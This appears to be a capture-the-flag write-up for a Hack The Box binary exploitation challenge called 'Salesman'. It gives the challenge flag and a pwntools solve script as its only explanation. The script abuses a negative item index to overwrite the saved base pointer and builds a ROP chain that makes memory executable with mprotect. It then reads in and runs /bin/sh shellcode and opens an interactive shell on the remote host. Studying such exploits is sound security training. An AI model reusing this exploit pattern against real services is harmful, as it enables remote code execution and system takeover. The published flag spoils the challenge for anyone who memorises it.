Salesman

I see you are new in town adventurer! Here you can pick whatever you want to continue your journey. Need a pet companion? Our arachnoids are the best. Ready to fight? Our pistols are here for you. Lost in time? Our watch will definately save you!

Category: pwn

Solver: t0b1, s3rp3ntL0v3r

Flag: HTB{00b_4nd_p1v0t_2_th3_st34m_w0rld!}

Writeup

See solve script below.

Solver

from pwn import *

LOCAL = False
HOST = '167.172.52.221'
PORT = 30371
CHALLENGE = './salesman'

context.terminal = ['tmux', 'splitw', '-h']
# context.arch = "amd64"
context.log_level = "info"
context.binary = elf = ELF(CHALLENGE)

re = lambda a: p.recv(a)
reu = lambda a: p.recvuntil(a)
rl = lambda: p.recvline()
s = lambda a: p.send(a)
sl = lambda a: p.sendline(a)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)

p = gdb.debug(CHALLENGE, '') if LOCAL else remote(HOST, PORT)

rop = ROP(elf)
rop.mprotect(0x400000, 0x1000, 0x7)
rop.read(0, 0x400000, 0x100)
rop.call(0x400000)

payload = b'A' * 8
payload += rop.chain()

# Overwrite base pointer
sla(b'Item: ', '-2')
sla(b'> ', payload)

# As we overwrite the base pointer and the menu for loop checks
# relative to the $rbp whose memory is initialized with 0,
# we do three rounds instead of two.
for i in range(2):
    info(f'Run {i+1}')
    sla(b'Item: ', '0')
    sla(b'> ', b'a')
    info('Done')
    
info('Done')

shell = asm(shellcraft.sh())
p.sendline(shell)

p.interactive()

Writeup#

Solver#

Writeup

Solver